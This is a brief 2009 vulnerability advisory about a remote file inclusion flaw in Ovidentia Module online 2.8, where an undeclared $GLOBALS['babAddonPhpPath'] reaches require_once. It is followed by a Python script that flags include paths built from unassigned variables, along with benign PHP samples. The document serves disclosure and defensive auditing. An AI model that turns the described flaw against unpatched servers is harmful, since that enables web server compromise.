Vendor: Module online
By: bd0rk
CVSS: 7,5 (HIGH)
Remote File Include
CWE: 98
Product Name: Module online
Affected Version From: 2.8
Affected Version To: 2.8
Patch Exists: YES
Related CWE: N/A
CPE: ovidentia:online
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
The $GLOBALS['babAddonPhpPath'] parameter isn't declared before require_once, so it's possible to compromise the web server through it. An attacker can inject some PHP shellcode. I think it's a big problem in this web software!
Mitigation:
Declare the vulnerable parameter or use an alert.
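
A heuristic source audit for the condition described above, as an added example that is not part of the original advisory or of Ovidentia's code: it flags include/require statements whose path is built from a variable that the same file never assigns first. The PHP samples and the file name functions.php are constructed for illustration.

```python
import re

# Constructed samples (not Ovidentia source); "functions.php" is a hypothetical name.
SAMPLE_VULNERABLE = """<?php
/* addon file that can be requested directly */
require_once $GLOBALS['babAddonPhpPath'] . "functions.php";
"""
SAMPLE_FIXED = """<?php
// path is set server-side before it is used
$GLOBALS['babAddonPhpPath'] = __DIR__ . '/';
require_once $GLOBALS['babAddonPhpPath'] . "functions.php";
"""

INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b([^;]*);", re.I)
VAR_RE = re.compile(r"""\$GLOBALS\[\s*['"](\w+)['"]\s*\]|\$(\w+)""")
ASSIGN_TMPL = r"""(?:\$GLOBALS\[\s*['"]%s['"]\s*\]|\$%s\b)\s*=(?![=>])"""


def _blank_comments(src):
    """Blank /* */ blocks and whole-line // or # comments, keeping line numbers."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), src, flags=re.S)
    return "\n".join("" if ln.lstrip().startswith(("//", "#")) else ln
                     for ln in src.split("\n"))


def unset_include_vars(php_source):
    """Return [(line, variable)] for include/require paths built from a variable
    that this file never assigns before the statement (heuristic, regex-based)."""
    src = _blank_comments(php_source)
    findings = []
    for m in INCLUDE_RE.finditer(src):
        before = src[:m.start()]
        line = before.count("\n") + 1
        for global_name, plain_name in VAR_RE.findall(m.group(1)):
            name = global_name or plain_name
            if name in ("GLOBALS", "this"):
                continue  # container names, not the path variable itself
            if not re.search(ASSIGN_TMPL % (name, name), before):
                findings.append((line, name))
    return findings


if __name__ == "__main__":
    print("vulnerable:", unset_include_vars(SAMPLE_VULNERABLE))
    print("fixed:     ", unset_include_vars(SAMPLE_FIXED))
```

An assignment copied from request data still counts as assigned here, so a clean result narrows the review but does not prove an include is safe.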